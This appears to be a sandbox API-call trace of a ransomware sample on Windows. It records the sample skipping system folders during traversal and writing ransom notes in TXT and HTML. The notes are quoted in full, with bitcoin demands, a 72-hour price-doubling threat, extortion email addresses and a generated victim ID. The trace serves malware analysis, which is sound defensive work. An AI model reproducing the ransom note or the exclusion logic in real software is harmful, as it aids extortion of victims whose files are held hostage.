	[0178.080] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="windows") returned 0x0
	[0178.080] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.080] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="boot") returned 0x0
	[0178.080] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.081] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="system volume information") returned 0x0
	[0178.081] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.081] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.081] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.081] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="temp") returned 0x0
	[0178.081] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.081] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="program files") returned 0x0
	[0178.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.082] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.082] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="appdata") returned 0x0
	[0178.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.082] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="application data") returned 0x0
	[0178.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.082] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="winnt") returned 0x0
	[0178.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.083] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="tmp") returned 0x0
	[0178.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.083] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="cache") returned 0x0
	[0178.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.083] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="temporary internet files") returned 0x0
	[0178.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.083] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="webcache") returned 0x0
	[0178.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.084] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="inetcache") returned 0x0
	[0178.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.084] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="nvidia") returned 0x0
	[0178.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.084] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="packages") returned 0x0
	[0178.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.085] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="cookies") returned 0x0
	[0178.085] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.085] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="programdata") returned 0x0
	[0178.085] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xa4af3a5b, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xa4af3a5b, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0178.085] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xa4af3a5b, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xa4af3a5b, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1
	[0178.085] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xa4af3a5b, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xa4af3a5b, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 0
	[0178.085] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0178.086] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0178.086] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Oracle" | out: lpString1="C:\\Users\\All Users\\Oracle") returned="C:\\Users\\All Users\\Oracle"
	[0178.086] lstrcatW (in: lpString1="C:\\Users\\All Users\\Oracle", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Oracle\\*.*") returned="C:\\Users\\All Users\\Oracle\\*.*"
	[0178.086] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.086] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.087] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Oracle\\HELP_DECRYPT_YOUR_FILES.TXT") returned 53
	[0178.087] CreateFileW (lpFileName="C:\\Users\\All Users\\Oracle\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\oracle\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.087] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0178.087] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0178.205] CloseHandle (hObject=0x380) returned 1
	[0178.205] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.206] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.206] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0178.207] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0178.207] CreateFileW (lpFileName="C:\\Users\\All Users\\Oracle\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\oracle\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.207] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0178.208] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0178.208] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0178.208] CloseHandle (hObject=0x380) returned 1
	[0178.208] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.209] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.209] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0178.209] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Oracle\\HELP_DECRYPT_YOUR_FILES.HTML") returned 54
	[0178.209] CreateFileW (lpFileName="C:\\Users\\All Users\\Oracle\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\oracle\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.210] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0178.210] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0178.213] CloseHandle (hObject=0x380) returned 1
	[0178.213] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.214] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.214] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.215] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0178.216] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.216] CreateFileW (lpFileName="C:\\Users\\All Users\\Oracle\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\oracle\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.216] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0178.216] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.216] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0178.217] CloseHandle (hObject=0x380) returned 1
	[0178.217] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Oracle\\*.*" (normalized: "c:\\users\\all users\\oracle\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xa4af3a5b, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0x83bfa297, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0178.217] lstrlenW (lpString="C:\\Users\\All Users\\Oracle\\*.*") returned 29
	[0178.217] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.217] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Oracle\\*.*", cchLength=0x1d | out: lpsz="c:\\users\\all users\\oracle\\*.*") returned 0x1d
	[0178.217] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.218] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="windows") returned 0x0
	[0178.218] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.218] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="boot") returned 0x0
	[0178.218] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.218] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="system volume information") returned 0x0
	[0178.218] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.219] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.219] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.219] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="temp") returned 0x0
	[0178.219] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.219] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="program files") returned 0x0
	[0178.219] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.219] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.219] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.220] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="appdata") returned 0x0
	[0178.220] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.220] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="application data") returned 0x0
	[0178.220] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.220] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="winnt") returned 0x0
	[0178.220] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.220] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="tmp") returned 0x0
	[0178.220] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.221] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="cache") returned 0x0
	[0178.221] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.221] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="temporary internet files") returned 0x0
	[0178.221] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.221] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="webcache") returned 0x0
	[0178.221] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.221] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="inetcache") returned 0x0
	[0178.222] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.222] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="nvidia") returned 0x0
	[0178.222] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.222] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="packages") returned 0x0
	[0178.222] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.222] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="cookies") returned 0x0
	[0178.222] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.223] StrStrW (lpFirst="c:\\users\\all users\\oracle\\*.*", lpSrch="programdata") returned 0x0
	[0178.223] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0178.223] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0178.223] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xa4af3a5b, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0x83bfa297, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0178.223] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0178.223] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83bfa297, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x83bfa297, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83c207e6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0178.223] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83ac8fb8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x83ac8fb8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83bfa297, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0178.223] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xa4af3a5b, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xa4af3a5b, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1
	[0178.224] lstrcmpW (lpString1="Java", lpString2="..") returned 1
	[0178.224] lstrcmpW (lpString1="Java", lpString2=".") returned 1
	[0178.224] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Oracle" | out: lpString1="C:\\Users\\All Users\\Oracle") returned="C:\\Users\\All Users\\Oracle"
	[0178.224] lstrcatW (in: lpString1="C:\\Users\\All Users\\Oracle", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Oracle\\") returned="C:\\Users\\All Users\\Oracle\\"
	[0178.224] lstrcatW (in: lpString1="C:\\Users\\All Users\\Oracle\\", lpString2="Java" | out: lpString1="C:\\Users\\All Users\\Oracle\\Java") returned="C:\\Users\\All Users\\Oracle\\Java"
	[0178.224] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Oracle\\Java" | out: lpString1="C:\\Users\\All Users\\Oracle\\Java") returned="C:\\Users\\All Users\\Oracle\\Java"
	[0178.224] lstrcatW (in: lpString1="C:\\Users\\All Users\\Oracle\\Java", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Oracle\\Java\\") returned="C:\\Users\\All Users\\Oracle\\Java\\"
	[0178.224] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Oracle\\Java\\" | out: lpString1="C:\\Users\\All Users\\Oracle\\Java\\") returned="C:\\Users\\All Users\\Oracle\\Java\\"
	[0178.225] lstrcatW (in: lpString1="C:\\Users\\All Users\\Oracle\\Java\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Oracle\\Java\\*.*") returned="C:\\Users\\All Users\\Oracle\\Java\\*.*"
	[0178.225] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Oracle\\Java\\*.*" (normalized: "c:\\users\\all users\\oracle\\java\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xa4af3a5b, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xa4af3a5b, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0178.225] lstrlenW (lpString="C:\\Users\\All Users\\Oracle\\Java\\*.*") returned 34
	[0178.225] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.225] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Oracle\\Java\\*.*", cchLength=0x22 | out: lpsz="c:\\users\\all users\\oracle\\java\\*.*") returned 0x22
	[0178.225] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.226] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="windows") returned 0x0
	[0178.226] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.226] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="boot") returned 0x0
	[0178.226] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.226] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="system volume information") returned 0x0
	[0178.226] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.226] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.226] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.227] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="temp") returned 0x0
	[0178.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.227] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="program files") returned 0x0
	[0178.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.227] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.227] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="appdata") returned 0x0
	[0178.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.228] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="application data") returned 0x0
	[0178.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.228] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="winnt") returned 0x0
	[0178.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.228] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="tmp") returned 0x0
	[0178.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.241] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="cache") returned 0x0
	[0178.241] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.242] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="temporary internet files") returned 0x0
	[0178.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.242] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="webcache") returned 0x0
	[0178.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.242] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="inetcache") returned 0x0
	[0178.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.242] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="nvidia") returned 0x0
	[0178.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.243] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="packages") returned 0x0
	[0178.243] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.243] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="cookies") returned 0x0
	[0178.243] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.243] StrStrW (lpFirst="c:\\users\\all users\\oracle\\java\\*.*", lpSrch="programdata") returned 0x0
